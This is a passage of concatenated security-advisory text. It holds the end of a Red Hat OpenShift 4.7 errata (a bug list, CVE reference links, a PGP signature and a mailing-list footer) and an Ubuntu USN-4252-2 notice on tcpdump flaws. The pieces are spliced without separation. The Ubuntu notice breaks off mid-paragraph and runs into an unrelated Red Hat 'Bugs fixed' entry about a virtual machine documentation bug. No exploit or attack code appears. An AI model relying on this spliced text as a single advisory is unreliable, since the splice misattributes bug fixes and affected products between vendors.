1915828 - Latest Dell firmware (04.40.00.00) fails to install IPI on BM using idrac-virtualmedia protocol
1915859 - vsphere-problem-detector: does not report ESXi host version nor VM HW version
1915871 - operator-sdk version in new downstream image should be v1.2.0-ocp not v4.7.0
1915879 - Pipeline Dashboard tab Rename to Pipeline Metrics
1915885 - Kuryr doesn't support workers running on multiple subnets
1915898 - TaskRun log output shows "undefined" in streaming
1915907 - test/cmd/builds.sh uses docker.io
1915912 - sig-storage-csi-snapshotter image not available
1915926 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART
1915929 - A11y Violation: svg-img-alt for time axis of Utilization Card on Cluster Dashboard
1915939 - Resizing the browser window removes Web Terminal Icon
1915945 - [sig-scheduling] SchedulerPreemption [Serial] validates basic preemption works [Conformance]
1915959 - Baremetal cluster operator is included in a ROKS installation of 4.7
1915962 - ROKS: manifest with machine health check fails to apply in 4.7
1915972 - Global configuration breadcrumbs do not work as expected
1915981 - Install ethtool and conntrack in container for debugging
1915995 - "Edit RoleBinding Subject" action under RoleBinding list page kebab actions causes unhandled exception
1915998 - Installer bootstrap node setting of additional subnets inconsistent with additional security groups
1916021 - OLM enters infinite loop if Pending CSV replaces itself
1916056 - Need Visual Web Terminal metric enabled for OCP monitoring telemetry
1916081 - non-existant should be non-existent in CloudCredentialOperatorTargetNamespaceMissing alert's annotations
1916099 - VM creation - customization wizard - user should be allowed to delete and re-create root disk
1916126 - [e2e][automation] Help fix tests for vm guest-agent and next-run-configuration
1916145 - Explicitly set minimum versions of python libraries
1916164 - Update csi-driver-nfs builder & base images to be consistent with ART
1916221 - csi-snapshot-controller-operator: bump dependencies for 4.7
1916271 - Known issues should mention failure to apply soft-anti-affinity to masters beyond the third
1916363 - [OVN] ovs-configuration.service reports as failed within all nodes using version 4.7.0-fc.2
1916379 - error metrics from vsphere-problem-detector should be gauge
1916382 - Can't create ext4 filesystems with Ignition
1916384 - 4.5.15 and later cluster-version operator does not sync ClusterVersion status before exiting, leaving 'verified: false' even for verified updates
1916401 - Deleting an ingress controller with a bad DNS Record hangs
1916417 - [Kuryr] Must-gather does not have all Custom Resources information
1916419 - [sig-devex][Feature:ImageEcosystem][Slow] openshift images should be SCL enabled returning s2i usage when running the image
1916454 - teach CCO about upgradeability from 4.6 to 4.7
1916486 - [OCP RHV] [Docs] Update RHV CSI provisioning section in OCP documenation
1916502 - Boot disk mirroring fails with mdadm error
1916524 - Two rootdisk shows on storage step
1916580 - Default yaml is broken for VM and VM template
1916621 - oc adm node-logs examples are wrong
1916642 - [zh_CN] Redundant period in Secrets - Create drop down menu - Key value secret.
1916692 - Possibly fails to destroy LB and thus cluster
1916711 - Update Kube dependencies in MCO to 1.20.0
1916747 - remove links to quick starts if virtualization operator isn't updated to 2.6
1916764 - editing a workload with no application applied, will auto fill the app
1916834 - Pipeline Metrics - Text Updates
1916843 - collect logs from openshift-sdn-controller pod
1916853 - cluster will not gracefully recover if openshift-etcd namespace is removed
1916882 - OCS 4.7 LSO : wizard (Discover disks and create storageclass) does not show zone when topology.kubernetes.io/zone are added manually
1916888 - OCS wizard Donor chart does not get updated when `Device Type` is edited
1916938 - Using 4.6 install-config.yaml file with lbFloatingIP results in validation error "Forbidden: cannot specify lbFloatingIP and apiFloatingIP together"
1916949 - ROKS: manifests in openshift-oauth-apiserver ns fails to create with non-existent namespace
1917101 - [UPI on oVirt] - 'RHCOS image' topic isn't located in the right place in UPI document
1917114 - Upgrade from 4.5.9 to 4.7 fails as authentication operator is Degraded due to '"ProxyConfigController" controller failed to sync "key"' error
1917117 - Common templates - disks screen: invalid disk name
1917124 - Custom template - clone existing PVC - the name of the target VM's data volume is hard-coded; only one VM can be created
1917146 - [oVirt] Consume 23-10 ovirt sdk- csi operator
1917147 - [oVirt] csi operator panics if ovirt-engine suddenly becomes unavailable.
1917148 - [oVirt] Consume 23-10 ovirt sdk
1917239 - Monitoring time options overlaps monitoring tab navigation when Quickstart panel is opened
1917272 - Should update the default minSize to 1Gi when create localvolumeset on web console
1917303 - [automation][e2e] make kubevirt-plugin gating job mandatory
1917315 - localvolumeset-local-provisoner-xxx pods are not killed after upgrading from 4.6 to 4.7
1917327 - annotations.message maybe wrong for NTOPodsNotReady alert
1917367 - Refactor periodic.go
1917371 - Add docs on how to use the built-in profiler
1917372 - Application metrics are shown on Metrics dashboard but not in linked Prometheus UI in OCP management console
1917395 - pv-pool backing store name restriction should be at 43 characters from the ocs ui
1917484 - [BM][IPI] Failed to scale down machineset
1917522 - Deprecate --filter-by-os in oc adm catalog mirror
1917537 - controllers continuously busy reconciling operator
1917551 - use min_over_time for vsphere prometheus alerts
1917585 - OLM Operator install page missing i18n
1917587 - Manila CSI operator becomes degraded if user doesn't have permissions to list share types
1917605 - Deleting an exgw causes pods to no longer route to other exgws
1917614 - [aws c2s] ingress operator uses unavailable resourcegrouptaggings API
1917656 - Add to Project/application for eventSources from topology shows 404
1917658 - Show TP badge for sources powered by camel connectors in create flow
1917660 - Editing parallelism of job get error info
1917678 - Could not provision pv when no symlink and target found on rhel worker
1917679 - Hide double CTA in admin pipelineruns tab
1917683 - `NodeTextFileCollectorScrapeError` alert in OCP 4.6 cluster.
1917759 - Console operator panics after setting plugin that does not exists to the console-operator config
1917765 - ansible-operator version in downstream image should be v1.3.0 not v4.7.0
1917770 - helm-operator version in downstream image should be v1.3.0 not v4.7.0
1917799 - Gather s list of names and versions of installed OLM operators
1917803 - [sig-storage] Pod Disks should be able to delete a non-existent PD without error
1917814 - Show Broker create option in eventing under admin perspective
1917838 - MachineSet scaling from 0 is not available or evaluated incorrectly for the new or changed instance types
1917872 - [oVirt] rebase on latest SDK 2021-01-12
1917911 - network-tools needs ovnkube-trace binary from ovn-kubernetes image
1917938 - upgrade version of dnsmasq package
1917942 - Canary controller causes panic in ingress-operator
1918019 - Undesired scrollbars in markdown area of QuickStart
1918068 - Flaky olm integration tests
1918085 - reversed name of job and namespace in cvo log
1918112 - Flavor is not editable if a customize VM is created from cli
1918129 - Update IO sample archive with missing resources & remove IP anonymization from clusteroperator resources
1918132 - i18n: Volume Snapshot Contents menu is not translated
1918133 - [e2e][automation] Fix ocp 4.7 existing tests - part2
1918140 - Deployment openstack-cinder-csi-driver-controller and openstack-manila-csi-controllerplugin doesn't be installed on OSP
1918153 - When `&` character is set as an environment variable in a build config it is getting converted as `\u0026`
1918185 - Capitalization on PLR details page
1918287 - [ovirt] ovirt csi driver is flooding RHV with API calls and spam the event UI with new connections
1918318 - Kamelet connector's are not shown in eventing section under Admin perspective
1918351 - Gather SAP configuration (SCC & ClusterRoleBinding)
1918375 - [calico] rbac-proxy container in kube-proxy fails to create tokenreviews
1918395 - [ovirt] increase livenessProbe period
1918415 - MCD nil pointer on dropins
1918438 - [ja_JP, zh_CN] Serverless i18n misses
1918440 - Kernel Arguments get reapplied even when no new kargs has been added in MachineConfig
1918471 - CustomNoUpgrade Feature gates are not working correctly
1918558 - Supermicro nodes boot to PXE upon reboot after successful deployment to disk
1918622 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART
1918623 - Updating ose-jenkins-agent-nodejs-12 builder & base images to be consistent with ART
1918625 - Updating ose-jenkins-agent-nodejs-10 builder & base images to be consistent with ART
1918635 - Updating openshift-jenkins-2 builder & base images to be consistent with ART #1197
1918639 - Event listener with triggerRef crashes the console
1918648 - Subscription page doesn't show InstallPlan correctly
1918716 - Manilacsi becomes degraded even though it is not available with the underlying Openstack
1918748 - helmchartrepo is not http(s)_proxy-aware
1918757 - Consistant fallures of features/project-creation.feature Cypress test in CI
1918803 - Need dedicated details page w/ global config breadcrumbs for 'KnativeServing' plugin
1918826 - Insights popover icons are not horizontally aligned
1918879 - need better debug for bad pull secrets
1918958 - The default NMstate instance from the operator is incorrect
1919097 - Close bracket ")" missing at the end of the sentence in the UI
1919231 - quick search modal cut off on smaller screens
1919259 - Make "Add x" singular in Pipeline Builder
1919260 - VM Template list actions should not wrap
1919271 - NM prepender script doesn't support systemd-resolved
1919341 - Updating ose-jenkins-agent-maven builder & base images to be consistent with ART
1919360 - Need managed-cluster-info metric enabled for OCP monitoring telemetry
1919379 - dotnet logo out of date
1919387 - Console login fails with no error when it can't write to localStorage
1919396 - A11y Violation: svg-img-alt on Pod Status ring
1919407 - OpenStack IPI has three-node control plane limitation, but InstallConfigs aren't verified
1919750 - Search InstallPlans got Minified React error
1919778 - Upgrade is stuck in insights operator Degraded with "Source clusterconfig could not be retrieved" until insights operator pod is manually deleted
1919823 - OCP 4.7 Internationalization Chinese tranlate issue
1919851 - Visualization does not render when Pipeline & Task share same name
1919862 - The tip information for `oc new-project --skip-config-write` is wrong
1919876 - VM created via customize wizard cannot inherit template's PVC attributes
1919877 - Click on KSVC breaks with white screen
1919879 - The toolbox container name is changed from 'toolbox-root' to 'toolbox-' in a chroot environment
1919945 - user entered name value overridden by default value when selecting a git repository
1919968 - [release-4.7] Undiagnosed panic detected in pod runtime.go:76: invalid memory address or nil pointer dereference
1919970 - NTO does not update when the tuned profile is updated.
1919999 - Bump Cluster Resource Operator Golang Versions
1920027 - machine-config-operator consistently failing during 4.6 to 4.7 upgrades and clusters do not install successfully with proxy configuration
1920200 - user-settings network error results in infinite loop of requests
1920205 - operator-registry e2e tests not working properly
1920214 - Bump golang to 1.15 in cluster-resource-override-admission
1920248 - re-running the pipelinerun with pipelinespec crashes the UI
1920320 - VM template field is "Not available" if it's created from common template
1920367 - When creating localvolumeset instance from the web console, the title for setting volumeMode is `Disk Mode`
1920368 - Fix containers creation issue resulting in runc running on Guaranteed Pod CPUs
1920390 - Monitoring > Metrics graph shifts to the left when clicking the "Stacked" option and when toggling data series lines on / off
1920426 - Egress Router CNI OWNERS file should have ovn-k team members
1920427 - Need to update `oc login` help page since we don't support prompt interactively for the username
1920430 - [V2V] [UI] Browser window becomes empty when running import wizard for the first time
1920438 - openshift-tuned panics on turning debugging on/off.
1920445 - e2e-gcp-ovn-upgrade job is actually using openshift-sdn
1920481 - kuryr-cni pods using unreasonable amount of CPU
1920509 - wait for port 6443 to be open in the kube-scheduler container; use ss instead of lsof
1920524 - Topology graph crashes adding Open Data Hub operator
1920526 - catalog operator causing CPU spikes and bad etcd performance
1920551 - Boot Order is not editable for Templates in "openshift" namespace
1920555 - bump cluster-resource-override-admission api dependencies
1920571 - fcp multipath will not recover failed paths automatically
1920619 - Remove default scheduler profile value
1920655 - Console should not show the Create Autoscaler link in cluster settings when the CRD is not present
1920674 - MissingKey errors in bindings namespace
1920684 - Text in language preferences modal is misleading
1920695 - CI is broken because of bad image registry reference in the Makefile
1920756 - update generic-admission-server library to get the system:masters authorization optimization
1920769 - [Upgrade] OCP upgrade from 4.6.13 to 4.7.0-fc.4 for "network-check-target" failed when "defaultNodeSelector" is set
1920771 - i18n: Delete persistent volume claim drop down is not translated
1920806 - [OVN]Nodes lost network connection after reboot on the vSphere UPI
1920912 - Unable to power off BMH from console
1920981 - When OCS was deployed with arbiter mode enable add capacity is increasing the count by "2"
1920984 - [e2e][automation] some menu items names are out dated
1921013 - Gather PersistentVolume definition (if any) used in image registry config
1921023 - Do not enable Flexible Scaling to true for Internal mode clusters(revert to 4.6 behavior)
1921087 - 'start next quick start' link doesn't work and is unintuitive
1921088 - test-cmd is failing on volumes.sh pretty consistently
1921248 - Clarify the kubelet configuration cr description
1921253 - Text filter default placeholder text not internationalized
1921258 - User Preferences: Active perspective and project change in the current window when selected in a different window
1921275 - Panic in authentication-operator in (*deploymentController).updateOperatorDeploymentInfo
1921277 - Fix Warning and Info log statements to handle arguments
1921281 - oc get -o yaml --export returns "error: unknown flag: --export"
1921458 - [SDK] Gracefully handle the `run bundle-upgrade` if the lower version operator doesn't exist
1921556 - [OCS with Vault]: OCS pods didn't comeup after deploying with Vault details from UI
1921572 - For external source (i.e GitHub Source) form view as well shows yaml
1921580 - [e2e][automation]Test VM detail view actions dropdown does not pass
1921610 - Pipeline metrics font size inconsistency
1921644 - [e2e][automation] tests errors with wrong cloudInit new line syntax
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1921655 - [OSP] Incorrect error handling during cloudinfo generation
1921713 - [e2e][automation] fix failing VM migration tests
1921762 - Serving and Eventing breadcrumbs should direct users back to tabbed page view
1921774 - delete application modal errors when a resource cannot be found
1921806 - Explore page APIResourceLinks aren't i18ned
1921823 - CheckBoxControls not internationalized
1921836 - AccessTableRows don't internationalize "User" or "Group"
1921857 - Test flake when hitting router in e2e tests due to one router not being up to date
1921880 - Dynamic plugins are not initialized on console load in production mode
1921911 - Installer PR #4589 is causing leak of IAM role policy bindings
1921921 - "Global Configuration" breadcrumb does not use sentence case
1921949 - Console bug - source code URL broken for gitlab self-hosted repositories
1921954 - Subscription-related constraints in ResolutionFailed events are misleading
1922015 - buttons in modal header are invisible on Safari
1922021 - Nodes terminal page 'Expand' 'Collapse' button not translated
1922050 - [e2e][automation] Improve vm clone tests
1922066 - Cannot create VM from custom template which has extra disk
1922098 - Namespace selection dialog is not closed after select a namespace
1922099 - Updated Readme documentation for QE code review and setup
1922146 - Egress Router CNI doesn't have logging support.
1922267 - Collect specific ADFS error
1922292 - Bump RHCOS boot images for 4.7
1922454 - CRI-O doesn't enable pprof by default
1922473 - reconcile LSO images for 4.8
1922573 - oc returns an error while using -o jsonpath when there is no resource found in the namespace
1922782 - Source registry missing docker:// in yaml
1922907 - Interop UI Tests - step implementation for updating feature files
1922911 - Page crash when click the "Stacked" checkbox after clicking the data series toggle buttons
1922991 - "verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build" test fails on OKD
1923003 - WebConsole Insights widget showing "Issues pending" when the cluster doesn't report anything
1923098 - [vsphere-problem-detector-operator] Need permission to access replicasets.apps resources
1923102 - [vsphere-problem-detector-operator] pod's version is not correct
1923245 - [Assisted-4.7] [Staging][Minimal-ISO] nodes fails to boot
1923674 - k8s 1.20 vendor dependencies
1923721 - PipelineRun running status icon is not rotating
1923753 - Increase initialDelaySeconds for ovs-daemons container in the ovs-node daemonset for upgrade scenarios
1923774 - Docker builds failing for openshift/cluster-resource-override-admission-operator
1923802 - ci/prow/e2e-aws-olm build failing for openshift/cluster-resource-override-admission-operator
1923874 - Unable to specify values with % in kubeletconfig
1923888 - Fixes error metadata gathering
1923892 - Update arch.md after refactor.
1923894 - "installed" operator status in operatorhub page does not reflect the real status of operator
1923895 - Changelog generation.
1923911 - [e2e][automation] Improve tests for vm details page and list filter
1923945 - PVC Name and Namespace resets when user changes os/flavor/workload
1923951 - EventSources shows `undefined` in project
1923973 - Dynamic plugin demo README does not contain info how to enable the ConsolePlugins
1924046 - Localhost: Refreshing on a Project removes it from nav item urls
1924078 - Topology quick search View all results footer should be sticky.
1924081 - NTO should ship the latest Tuned daemon release 2.15
1924084 - backend tests incorrectly hard-code artifacts dir
1924128 - [sig-builds][Feature:Builds] verify /run filesystem contents do not have unexpected content using a simple Docker Strategy Build
1924135 - Under sufficient load, CRI-O may segfault
1924143 - Code Editor Decorator url is broken for Bitbucket repos
1924188 - Language selector dropdown doesn't always pre-select the language
1924365 - Add extra disk for VM which use boot source PXE
1924383 - Degraded network operator during upgrade to 4.7.z
1924387 - [ja_JP][zh_CN] Incorrect warning message for deleting namespace on Delete Pod dialog box.
1924480 - non cluster admin can not take VM snapshot: An error occurred, cannot set blockOwnerDeletion if an ownerReference refers to a resource you can't set finalizers on
1924583 - Deprectaed templates are listed in the Templates screen
1924870 - pick upstream pr#96901: plumb context with request deadline
1924955 - Images from Private external registry not working in deploy Image
1924961 - k8sutil.TrimDNS1123Label creates invalid values
1924985 - Build egress-router-cni for both RHEL 7 and 8
1925020 - Console demo plugin deployment image shoult not point to dockerhub
1925024 - Remove extra validations on kafka source form view net section
1925039 - [e2e] Fix Test - ID(CNV-5327) Change Custom Flavor while VM is running
1925072 - NTO needs to ship the current latest stalld v1.7.0
1925163 - Missing info about dev catalog in boot source template column
1925200 - Monitoring Alert icon is missing on the workload in Topology view
1925262 - apiserver getting 2 SIGTERM signals which was immediately making it exit code 1
1925319 - bash syntax error in configure-ovs.sh script
1925408 - Remove StatefulSet gatherer and replace it with gathering corresponding config map data
1925516 - Pipeline Metrics Tooltips are overlapping data
1925562 - Add new ArgoCD link from GitOps application environments page
1925596 - Gitops details page image and commit id text overflows past card boundary
1926556 - 'excessive etcd leader changes' test case failing in serial job because prometheus data is wiped by machine set test
1926588 - The tarball of operator-sdk is not ready for ocp4.7
1927456 - 4.7 still points to 4.6 catalog images
1927500 - API server exits non-zero on 2 SIGTERM signals
1929278 - Monitoring workloads using too high a priorityclass
1929645 - Remove openshift:kubevirt-machine-controllers decleration from machine-api
1929920 - Cluster monitoring documentation link is broken - 404 not found
5. References:
https://access.redhat.com/security/cve/CVE-2018-10103
https://access.redhat.com/security/cve/CVE-2018-10105
https://access.redhat.com/security/cve/CVE-2018-14461
https://access.redhat.com/security/cve/CVE-2018-14462
https://access.redhat.com/security/cve/CVE-2018-14463
https://access.redhat.com/security/cve/CVE-2018-14464
https://access.redhat.com/security/cve/CVE-2018-14465
https://access.redhat.com/security/cve/CVE-2018-14466
https://access.redhat.com/security/cve/CVE-2018-14467
https://access.redhat.com/security/cve/CVE-2018-14468
https://access.redhat.com/security/cve/CVE-2018-14469
https://access.redhat.com/security/cve/CVE-2018-14470
https://access.redhat.com/security/cve/CVE-2018-14553
https://access.redhat.com/security/cve/CVE-2018-14879
https://access.redhat.com/security/cve/CVE-2018-14880
https://access.redhat.com/security/cve/CVE-2018-14881
https://access.redhat.com/security/cve/CVE-2018-14882
https://access.redhat.com/security/cve/CVE-2018-16227
https://access.redhat.com/security/cve/CVE-2018-16228
https://access.redhat.com/security/cve/CVE-2018-16229
https://access.redhat.com/security/cve/CVE-2018-16230
https://access.redhat.com/security/cve/CVE-2018-16300
https://access.redhat.com/security/cve/CVE-2018-16451
https://access.redhat.com/security/cve/CVE-2018-16452
https://access.redhat.com/security/cve/CVE-2018-20843
https://access.redhat.com/security/cve/CVE-2019-3884
https://access.redhat.com/security/cve/CVE-2019-5018
https://access.redhat.com/security/cve/CVE-2019-6977
https://access.redhat.com/security/cve/CVE-2019-6978
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-9455
https://access.redhat.com/security/cve/CVE-2019-9458
https://access.redhat.com/security/cve/CVE-2019-11068
https://access.redhat.com/security/cve/CVE-2019-12614
https://access.redhat.com/security/cve/CVE-2019-13050
https://access.redhat.com/security/cve/CVE-2019-13225
https://access.redhat.com/security/cve/CVE-2019-13627
https://access.redhat.com/security/cve/CVE-2019-14889
https://access.redhat.com/security/cve/CVE-2019-15165
https://access.redhat.com/security/cve/CVE-2019-15166
https://access.redhat.com/security/cve/CVE-2019-15903
https://access.redhat.com/security/cve/CVE-2019-15917
https://access.redhat.com/security/cve/CVE-2019-15925
https://access.redhat.com/security/cve/CVE-2019-16167
https://access.redhat.com/security/cve/CVE-2019-16168
https://access.redhat.com/security/cve/CVE-2019-16231
https://access.redhat.com/security/cve/CVE-2019-16233
https://access.redhat.com/security/cve/CVE-2019-16935
https://access.redhat.com/security/cve/CVE-2019-17450
https://access.redhat.com/security/cve/CVE-2019-17546
https://access.redhat.com/security/cve/CVE-2019-18197
https://access.redhat.com/security/cve/CVE-2019-18808
https://access.redhat.com/security/cve/CVE-2019-18809
https://access.redhat.com/security/cve/CVE-2019-19046
https://access.redhat.com/security/cve/CVE-2019-19056
https://access.redhat.com/security/cve/CVE-2019-19062
https://access.redhat.com/security/cve/CVE-2019-19063
https://access.redhat.com/security/cve/CVE-2019-19068
https://access.redhat.com/security/cve/CVE-2019-19072
https://access.redhat.com/security/cve/CVE-2019-19221
https://access.redhat.com/security/cve/CVE-2019-19319
https://access.redhat.com/security/cve/CVE-2019-19332
https://access.redhat.com/security/cve/CVE-2019-19447
https://access.redhat.com/security/cve/CVE-2019-19524
https://access.redhat.com/security/cve/CVE-2019-19533
https://access.redhat.com/security/cve/CVE-2019-19537
https://access.redhat.com/security/cve/CVE-2019-19543
https://access.redhat.com/security/cve/CVE-2019-19602
https://access.redhat.com/security/cve/CVE-2019-19767
https://access.redhat.com/security/cve/CVE-2019-19770
https://access.redhat.com/security/cve/CVE-2019-19906
https://access.redhat.com/security/cve/CVE-2019-19956
https://access.redhat.com/security/cve/CVE-2019-20054
https://access.redhat.com/security/cve/CVE-2019-20218
https://access.redhat.com/security/cve/CVE-2019-20386
https://access.redhat.com/security/cve/CVE-2019-20387
https://access.redhat.com/security/cve/CVE-2019-20388
https://access.redhat.com/security/cve/CVE-2019-20454
https://access.redhat.com/security/cve/CVE-2019-20636
https://access.redhat.com/security/cve/CVE-2019-20807
https://access.redhat.com/security/cve/CVE-2019-20812
https://access.redhat.com/security/cve/CVE-2019-20907
https://access.redhat.com/security/cve/CVE-2019-20916
https://access.redhat.com/security/cve/CVE-2020-0305
https://access.redhat.com/security/cve/CVE-2020-0444
https://access.redhat.com/security/cve/CVE-2020-1716
https://access.redhat.com/security/cve/CVE-2020-1730
https://access.redhat.com/security/cve/CVE-2020-1751
https://access.redhat.com/security/cve/CVE-2020-1752
https://access.redhat.com/security/cve/CVE-2020-1971
https://access.redhat.com/security/cve/CVE-2020-2574
https://access.redhat.com/security/cve/CVE-2020-2752
https://access.redhat.com/security/cve/CVE-2020-2922
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3898
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-6405
https://access.redhat.com/security/cve/CVE-2020-7595
https://access.redhat.com/security/cve/CVE-2020-7774
https://access.redhat.com/security/cve/CVE-2020-8177
https://access.redhat.com/security/cve/CVE-2020-8492
https://access.redhat.com/security/cve/CVE-2020-8563
https://access.redhat.com/security/cve/CVE-2020-8566
https://access.redhat.com/security/cve/CVE-2020-8619
https://access.redhat.com/security/cve/CVE-2020-8622
https://access.redhat.com/security/cve/CVE-2020-8623
https://access.redhat.com/security/cve/CVE-2020-8624
https://access.redhat.com/security/cve/CVE-2020-8647
https://access.redhat.com/security/cve/CVE-2020-8648
https://access.redhat.com/security/cve/CVE-2020-8649
https://access.redhat.com/security/cve/CVE-2020-9327
https://access.redhat.com/security/cve/CVE-2020-9802
https://access.redhat.com/security/cve/CVE-2020-9803
https://access.redhat.com/security/cve/CVE-2020-9805
https://access.redhat.com/security/cve/CVE-2020-9806
https://access.redhat.com/security/cve/CVE-2020-9807
https://access.redhat.com/security/cve/CVE-2020-9843
https://access.redhat.com/security/cve/CVE-2020-9850
https://access.redhat.com/security/cve/CVE-2020-9862
https://access.redhat.com/security/cve/CVE-2020-9893
https://access.redhat.com/security/cve/CVE-2020-9894
https://access.redhat.com/security/cve/CVE-2020-9895
https://access.redhat.com/security/cve/CVE-2020-9915
https://access.redhat.com/security/cve/CVE-2020-9925
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-10029
https://access.redhat.com/security/cve/CVE-2020-10732
https://access.redhat.com/security/cve/CVE-2020-10749
https://access.redhat.com/security/cve/CVE-2020-10751
https://access.redhat.com/security/cve/CVE-2020-10763
https://access.redhat.com/security/cve/CVE-2020-10773
https://access.redhat.com/security/cve/CVE-2020-10774
https://access.redhat.com/security/cve/CVE-2020-10942
https://access.redhat.com/security/cve/CVE-2020-11565
https://access.redhat.com/security/cve/CVE-2020-11668
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/cve/CVE-2020-12465
https://access.redhat.com/security/cve/CVE-2020-12655
https://access.redhat.com/security/cve/CVE-2020-12659
https://access.redhat.com/security/cve/CVE-2020-12770
https://access.redhat.com/security/cve/CVE-2020-12826
https://access.redhat.com/security/cve/CVE-2020-13249
https://access.redhat.com/security/cve/CVE-2020-13630
https://access.redhat.com/security/cve/CVE-2020-13631
https://access.redhat.com/security/cve/CVE-2020-13632
https://access.redhat.com/security/cve/CVE-2020-14019
https://access.redhat.com/security/cve/CVE-2020-14040
https://access.redhat.com/security/cve/CVE-2020-14381
https://access.redhat.com/security/cve/CVE-2020-14382
https://access.redhat.com/security/cve/CVE-2020-14391
https://access.redhat.com/security/cve/CVE-2020-14422
https://access.redhat.com/security/cve/CVE-2020-15157
https://access.redhat.com/security/cve/CVE-2020-15503
https://access.redhat.com/security/cve/CVE-2020-15862
https://access.redhat.com/security/cve/CVE-2020-15999
https://access.redhat.com/security/cve/CVE-2020-16166
https://access.redhat.com/security/cve/CVE-2020-24490
https://access.redhat.com/security/cve/CVE-2020-24659
https://access.redhat.com/security/cve/CVE-2020-25211
https://access.redhat.com/security/cve/CVE-2020-25641
https://access.redhat.com/security/cve/CVE-2020-25658
https://access.redhat.com/security/cve/CVE-2020-25661
https://access.redhat.com/security/cve/CVE-2020-25662
https://access.redhat.com/security/cve/CVE-2020-25681
https://access.redhat.com/security/cve/CVE-2020-25682
https://access.redhat.com/security/cve/CVE-2020-25683
https://access.redhat.com/security/cve/CVE-2020-25684
https://access.redhat.com/security/cve/CVE-2020-25685
https://access.redhat.com/security/cve/CVE-2020-25686
https://access.redhat.com/security/cve/CVE-2020-25687
https://access.redhat.com/security/cve/CVE-2020-25694
https://access.redhat.com/security/cve/CVE-2020-25696
https://access.redhat.com/security/cve/CVE-2020-26160
https://access.redhat.com/security/cve/CVE-2020-27813
https://access.redhat.com/security/cve/CVE-2020-27846
https://access.redhat.com/security/cve/CVE-2020-28362
https://access.redhat.com/security/cve/CVE-2020-29652
https://access.redhat.com/security/cve/CVE-2021-2007
https://access.redhat.com/security/cve/CVE-2021-3121
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T
lmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H
EmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8
4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4
mWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL
ISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy
Ae5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk
4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM
uR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG
krzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv
RjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6
McvuEaxco7U=
=sw8i
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. =========================================================================
Ubuntu Security Notice USN-4252-2
January 27, 2020
tcpdump vulnerabilities
=========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
- Ubuntu 12.04 ESM
Summary:
Several security issues were fixed in tcpdump. This update provides
the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.
Original advisory details:
Multiple security issues were discovered in tcpdump. A remote attacker
could use these issues to cause tcpdump to crash, resulting in a denial of
service, or possibly execute arbitrary code. In general, a standard system update will make all the necessary
changes. Bugs fixed (https://bugzilla.redhat.com/):
1732329 - Virtual Machine is missing documentation of its properties in yaml editor
